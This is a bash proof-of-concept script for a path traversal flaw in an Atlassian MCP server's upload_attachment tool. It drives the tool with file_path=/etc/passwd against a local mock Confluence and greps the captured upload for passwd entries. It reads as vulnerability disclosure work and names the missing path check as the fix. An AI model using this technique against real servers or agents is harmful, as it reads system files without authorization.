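#!/usr/bin/env bash
# PoC run 1 — leak /etc/passwd via upload_attachment path traversal
# Vulnerable: sooperset/mcp-atlassian HEAD d8bc786
# CWE-22 — no validate_safe_path() on upload_attachment tool's file_path arg
#
# Reproduction harness: a local mock Confluence on 127.0.0.1 records the
# multipart body the MCP server sends when upload_attachment is called with
# file_path=/etc/passwd. If the file's bytes show up in that body, the tool
# read a path outside any intended upload directory.
# Server-side fix implied by the finding: resolve file_path and reject it
# unless it falls under an allowed base directory before the file is opened
# (the validate_safe_path() check named above).
#
# Exit status: 0 when the marker is found in the captured body, 1 otherwise.
set -u

cd -- "$(dirname -- "$0")" || {
  printf 'cannot cd to script directory\n' >&2
  exit 1
}

# NOTE(review): the venv lives at a fixed path under /tmp; on a shared host
# confirm it is owned by the current user before running binaries from it.
readonly VENV=/tmp/mcp-atlassian-venv
readonly PORT=18765

if [[ ! -x "$VENV/bin/python" ]]; then
  printf 'missing interpreter: %s\n' "$VENV/bin/python" >&2
  exit 1
fi

# The capture holds a copy of /etc/passwd, so keep it in a private mktemp
# directory (no predictable /tmp name) and delete it on every exit path.
WORKDIR=$(mktemp -d) || {
  printf 'mktemp failed\n' >&2
  exit 1
}
readonly WORKDIR
readonly CAPTURE="$WORKDIR/captured_body_run1.bin"
MOCK_PID=

cleanup() {
  # MOCK_PID is cleared once the mock has been reaped, so a recycled PID is
  # never signalled here.
  if [[ -n "$MOCK_PID" ]]; then
    kill "$MOCK_PID" 2>/dev/null
  fi
  rm -rf -- "${WORKDIR:?}"
}
trap cleanup EXIT

# 1. Start mock Confluence (writes the request body to $CAPTURE_PATH)
CAPTURE_PATH="$CAPTURE" "$VENV/bin/python" ./mock_confluence.py "$PORT" \
  >mock_run1.log 2>&1 &
MOCK_PID=$!
sleep 1 # fixed wait for the mock to start listening; see mock_run1.log if it did not

# 2. Fire MCP client → triggers upload_attachment with /etc/passwd
"$VENV/bin/python" ./mcp_client.py /etc/passwd "http://127.0.0.1:$PORT/wiki" "$VENV/bin/mcp-atlassian"
RC=$?
if ((RC != 0)); then
  # The verdict below comes from the captured body, not from this status,
  # but a failed client run explains an empty capture.
  printf 'warning: mcp_client.py exited with status %d\n' "$RC" >&2
fi

# 3. Give mock a moment to flush, then stop and reap it
sleep 1
kill "$MOCK_PID" 2>/dev/null
wait "$MOCK_PID" 2>/dev/null
MOCK_PID=

# 4. Proof: grep /etc/passwd contents out of captured multipart body
echo "---- CAPTURED BODY (first 800 bytes) ----"
head -c 800 "$CAPTURE" | cat -v
echo
echo "---- /etc/passwd MARKER HUNT ----"
# Marker assumes the host's passwd file has the usual "root:x:0:0" entry.
if grep -aq "root:x:0:0" "$CAPTURE"; then
  echo "PROOF: /etc/passwd bytes present in multipart body captured by mock Confluence"
  grep -ao 'root:x:0:0[^"]*' "$CAPTURE" | head -3
  exit 0
else
  echo "FAILED: no /etc/passwd bytes in captured body"
  exit 1
fi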